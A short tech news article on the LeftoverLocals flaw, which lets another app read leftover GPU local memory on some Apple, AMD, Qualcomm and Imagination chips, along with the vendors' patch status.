On-device AI can also pose a security risk

On-device artificial intelligence can also pose a security and privacy risk: in recent days, a team of researchers has exposed a flaw that involves, ironically, many Apple devices, a company that focuses heavily on the protection of its users in terms of functionality and marketing.

The flaw has been dubbed LeftoverLocals, and it originates in the way GPUs store data processed for AI purposes in memory. Basically, the data is written to an area of RAM called local storage, which is optimized for GPUs but is also easily accessible by unauthorized entities, who can then extract the data.

According to researchers, with less than 10 lines of code, it is possible to steal between 5 and 100 MB of data. The flaw is present in GPUs made by Apple, Imagination Technologies, AMD, and Qualcomm; GPUs from NVIDIA, Intel, and Arm are safe. The exploit can be executed by another app installed on a device, as long as it is allowed to read the memory used by the GPU. The attack vector, in short, is quite large and exploitable.

Apple said it has already released a corrective patch for its newer devices based on A17 Series or M3 Series chips, while for all older ones we don’t have precise and clear information on any timing. Apparently, the researchers re-tested the attack after a few days, and while a third-generation iPad Air is no longer vulnerable, an M2 MacBook Air still is.

AMD seems to be saying that the flaw cannot be corrected via software/firmware, but is at least trying to figure out if it can be mitigated in some way. As for Imagination, it’s Google that confirms that some GPUs are vulnerable. A corrective patch was released by Imagination itself to its customers in December 2023, customers in turn will have to patch it to the end devices – each with its own timelines. Qualcomm has finally released a corrective patch for at least some GPU models, but others may still be vulnerable.

LEAVE A REPLY

Please enter your comment!
Please enter your name here